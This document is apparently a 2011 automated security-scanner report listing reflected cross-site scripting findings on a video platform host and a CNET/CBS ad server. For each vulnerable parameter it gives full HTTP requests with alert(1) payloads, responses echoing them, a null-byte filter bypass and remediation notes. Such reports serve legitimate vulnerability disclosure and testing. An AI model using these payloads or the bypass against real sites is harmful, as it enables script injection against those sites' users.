{ "title": "Unsupported Metafile Format", "description": "'SMILe95c3<script>alert(1)</script>f28cf5071f0' is not a supported metafile format.", "isException": true, "exception": "UnsupportedFormat", "responseCode": "400" }
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 26a84<script>alert(1)</script>55ebb3179bb was submitted in the height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b?mbr=true&format=Script&Tracking=true&Embedded=true&height=17026a84<script>alert(1)</script>55ebb3179bb&width=300 HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:23:54 GMT Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store Content-Type: text/plain; charset=utf-8 Connection: close Server: Jetty(6.1.19)
{ "title": "Non-numeric Height", "description": "Height value '17026a84<script>alert(1)</script>55ebb3179bb' is not numeric.", "isException": true, "exception": "NonNumericHeight", "responseCode": "400" }
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 867f8<script>alert(1)</script>489146b40d8 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b?mbr=true&format=Script&Tracking=true&Embedded=true&height=170&width=300867f8<script>alert(1)</script>489146b40d8 HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:23:54 GMT Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store Content-Type: text/plain; charset=utf-8 Connection: close Server: Jetty(6.1.19)
{ "title": "Non-numeric Width", "description": "Width value '300867f8<script>alert(1)</script>489146b40d8' is not numeric.", "isException": true, "exception": "NonNumericWidth", "responseCode": "400" }
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8844e<script>alert(1)</script>0682728a301 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s8844e<script>alert(1)</script>0682728a301/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b/tracker.log?type=qos&ver=2&d=1317838937133&rid0=2148282888&t0=Morning%20Weather%20For%20Wednesday&tc0=1&lp0=0<0=0&pb0=100&pp0=0&pr0=0&nocache=1317839023208 HTTP/1.1 Host: link.theplatform.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://www.nbcnewyork.com/pdk442/pdk/swf/flvPlayer.swf Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Wed, 05 Oct 2011 18:23:09 GMT Content-Type: text/html; charset=iso-8859-1 Cache-Control: must-revalidate,no-cache,no-store Content-Length: 1458 Server: Jetty(6.1.19)
The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 15601<a>b1506bd2990 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:34 GMT Server: Apache/2.2 Content-Length: 628 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:34 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=11915601<a>b1506bd2990&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='1191560115062990' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ...[SNIP]...
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload bc981<a>4628697d88a was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:44:06 GMT Server: Apache/2.2 Content-Length: 527 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:44:06 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1bc981<a>4628697d88a&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1981462869788' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] c13-ad-xw4.cnet.com::1766078784 2011.10. ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52bd6'%3balert(1)//c6a452e4afb was submitted in the BRAND parameter. This input was echoed as 52bd6';alert(1)//c6a452e4afb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:23 GMT Server: Apache/2.2 Content-Length: 1183 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:23 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=5752bd6'%3balert(1)//c6a452e4afb&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA ...[SNIP]... <img alt="" height="0" src="http://adlog.com.com/adlog/i/r=17828&sg=1815&o=1%253a&h=cn&p=2&b=5752bd6';alert(1)//c6a452e4afb&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e18:4E8C48538098A1&orh=google.com&ort=&oepartner=&epartner=&ppartner=&pdom= ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload ef67c<a>361ee762561 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:57 GMT Server: Apache/2.2 Content-Length: 548 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:57 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57ef67c<a>361ee762561&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC- ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload f687f*/alert(1)//944081f3e70 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:25 GMT Server: Apache/2.2 Content-Length: 1181 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:25 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57f687f*/alert(1)//944081f3e70&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */d ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 44bf3<script>alert(1)</script>a44ebca738 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:22 GMT Server: Apache/2.2 Content-Length: 1942 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:22 GMT
/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlog.com.com/adlog/i/r=17584&sg=1815&o=1%253a&h=cn&p=2&b=5744bf3<script>alert(1)</script>a44ebca738&l=en_US&site=164&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e16:4E8C4866801E2F&orh=google.com&ort=&oepartner=&epartner=&ppartner=&pdom= ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload ec4bf<a>a844b722527 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:20 GMT Server: Apache/2.2 Content-Length: 570 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: text/plain Expires: Wed, 05 Oct 2011 18:38:20 GMT
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=jsec4bf<a>a844b722527&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=11 ...[SNIP]...
The value of the COOKIE%3AANON_ID request parameter is copied into a JavaScript inline comment. The payload 877f2*/alert(1)//39bfcd8b287 was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:04 GMT Server: Apache/2.2 Content-Length: 1154 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:04 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE877f2*/alert(1)//39bfcd8b287&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the COOKIE%3AANON_ID request parameter is copied into the HTML document as plain text between tags. The payload 123b0<a>6a7e1453ce8 was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:53 GMT Server: Apache/2.2 Content-Length: 547 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:53 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE123b0<a>6a7e1453ce8&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r2011090 ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into a JavaScript inline comment. The payload 6b7f1*/alert(1)//7b5fa437f9f was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:59 GMT Server: Apache/2.2 Content-Length: 1195 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:59 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=6b7f1*/alert(1)//7b5fa437f9f&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ...[SNIP]...
The value of the DVAR_GENRE request parameter is copied into the HTML document as plain text between tags. The payload 2c875<a>a1be7644765 was submitted in the DVAR_GENRE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:48 GMT Server: Apache/2.2 Content-Length: 548 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:48 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=2c875<a>a1be7644765&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BE ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 4742d*/alert(1)//e5c004eeb58 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:56 GMT Server: Apache/2.2 Content-Length: 1195 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:56 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US4742d*/alert(1)//e5c004eeb58&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 32dea<a>be5133e0620 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:29 GMT Server: Apache/2.2 Content-Length: 547 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:29 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US32dea<a>be5133e0620&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID= ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 5250a<a>d5ec91cd44b was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:23 GMT Server: Apache/2.2 Content-Length: 548 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:23 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e5250a<a>d5ec91cd44b&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COUL ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 4d276*/alert(1)//40f76449b96 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:42 GMT Server: Apache/2.2 Content-Length: 1195 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:42 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e4d276*/alert(1)//40f76449b96&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write(' ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload b67a5<a>92144380ab was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:16 GMT Server: Apache/2.2 Content-Length: 547 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:16 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSb67a5<a>92144380ab&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADR ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 59a61*/alert(1)//e2756141e3d was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:19 GMT Server: Apache/2.2 Content-Length: 1153 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:19 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS59a61*/alert(1)//e2756141e3d&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADR ...[SNIP]...
The value of the IREFER_HOST request parameter is copied into the HTML document as plain text between tags. The payload f6267<a>5fe47cea1af was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:43:42 GMT Server: Apache/2.2 Content-Length: 547 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:43:42 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.comf6267<a>5fe47cea1af&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] c13-a ...[SNIP]...
The value of the IREFER_HOST request parameter is copied into a JavaScript inline comment. The payload 58139*/alert(1)//838178ff82e was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:28 GMT Server: Apache/2.2 Content-Length: 1178 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:28 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com58139*/alert(1)//838178ff82e&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the META&ADSEPARATOR request parameter is copied into the HTML document as plain text between tags. The payload %007f307<script>alert(1)</script>2a337d0e7f3 was submitted in the META&ADSEPARATOR parameter. This input was echoed as 7f307<script>alert(1)</script>2a337d0e7f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:39 GMT Server: Apache/2.2 Content-Length: 1935 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:39 GMT
/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbs-pushdown",segmentId:"1815",rotatorId:"17584",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --><img src=\"http://adlo ...[SNIP]... "0\" WIDTH=\"0\" alt=\"\" style=\"position:absolute; top:0px; left:0px\" />"})/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw8.cnet.com::1204906304 2011.10.05.18.38.39 *//* MAC T 0.2.5.5 */;.7f307<script>alert(1)</script>2a337d0e7f3/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"ads_magnet",segmentId:"1815",rotatorId:"20384",creativeSizeId:"4",isBlank:"1",seg_pageState:"",adHTML:"<!-- default ad --> ...[SNIP]...
The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload c666a*/alert(1)//2a1c231c674 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:16 GMT Server: Apache/2.2 Content-Length: 1200 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:16 GMT
